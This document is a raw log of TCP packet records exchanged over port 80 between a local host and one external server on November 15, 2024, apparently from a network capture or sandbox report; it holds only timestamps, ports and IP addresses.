Nov 15, 2024 10:29:00.238817930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238852978 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.238878965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238890886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238903999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238914967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238928080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.238962889 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.238993883 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247544050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247590065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247627974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247682095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247690916 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247694969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247709036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247754097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247754097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247791052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247807026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247823000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247839928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247853041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247864008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.247890949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247890949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.247942924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.248150110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248236895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248250008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248262882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248275042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248286009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.248331070 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.248373032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248434067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248440027 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.248450041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.248526096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.255259037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255280018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255292892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255305052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255331993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255342007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.255359888 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.255389929 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.255389929 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274446011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274472952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274493933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274506092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274518013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274529934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274543047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274550915 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274555922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274590015 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274590015 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274660110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274692059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274705887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274744987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274744987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274772882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274786949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274916887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274962902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.274966002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274966002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.274976015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275000095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275012970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275058031 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275084019 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275253057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275295973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275306940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275351048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275367022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275382996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275396109 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275396109 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275412083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275423050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275434971 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275588036 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275718927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275830030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275842905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275856018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275870085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.275902987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.275964022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276002884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.276002884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276017904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276052952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276057005 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.276067019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276099920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276109934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276114941 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.276114941 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.276115894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.276191950 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.277690887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.277725935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.277738094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.277762890 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.277817011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.283514023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283551931 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283565998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283579111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283621073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.283621073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.283715010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283727884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.283791065 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.284075022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284121037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284137011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284183025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284194946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284199953 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.284209013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284230947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284244061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.284305096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.284305096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.284305096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.285010099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.285023928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.285038948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.285089016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.286709070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.286746025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.286756992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.286777020 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.286807060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.288872957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.288908005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.288984060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289047956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289061069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289074898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289092064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289104939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289115906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289118052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289163113 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289163113 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289170980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289185047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289196014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289254904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289433956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289454937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289468050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.289516926 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.289587021 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.293617010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.293632030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.293688059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.293740034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.293751955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.293796062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.295742035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295758009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295778990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295792103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295802116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295803070 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.295809984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.295855999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.295855999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.296035051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296047926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296060085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296086073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.296113968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296124935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296137094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296149969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296201944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.296201944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.296225071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296247959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.296428919 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.298523903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.298540115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.298552990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.298629999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.298629999 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.301876068 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.301915884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.301928997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.301971912 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.304150105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.304166079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.304179907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.304259062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.304259062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.305370092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.305407047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.305421114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.305638075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.309463024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.309504032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.309521914 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.309725046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.309737921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.309750080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.309782982 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.309806108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310035944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310046911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310065031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310077906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310089111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310094118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310158014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310177088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310185909 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310208082 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310237885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310259104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310271978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310332060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310332060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310400009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310420036 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310431957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310569048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310621977 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310621977 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.310642958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310656071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.310749054 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.314065933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.314084053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.314095974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.314193964 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.321027994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321048021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321063042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321074963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321100950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321110010 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.321150064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.321175098 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.321201086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321213007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.321271896 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336108923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336143970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336163998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336182117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336196899 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336241007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336242914 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336304903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336318970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336386919 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336396933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336409092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336421013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336438894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336482048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336482048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336496115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336667061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336704969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.336741924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.336741924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.345591068 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345644951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345665932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345679045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345691919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345702887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345715046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345726967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345804930 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.345901966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345910072 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.345949888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.345963001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346024036 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.346091986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346103907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346117020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346167088 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.346167088 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.346206903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346220016 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346231937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346242905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346254110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.346299887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.346299887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.348418951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348434925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348459005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348475933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348483086 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.348504066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348517895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348531008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.348551989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.348551989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.348623991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.354187012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.354204893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.354226112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.354234934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.354298115 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.354298115 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.355551004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355573893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355597973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355634928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355645895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.355648994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355663061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355684996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355695963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.355696917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.355750084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.355750084 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.364466906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364520073 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364531040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364543915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364557028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364567041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.364568949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.364589930 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.364635944 CET	49762	80	192.168.2.10	150.241.95.163
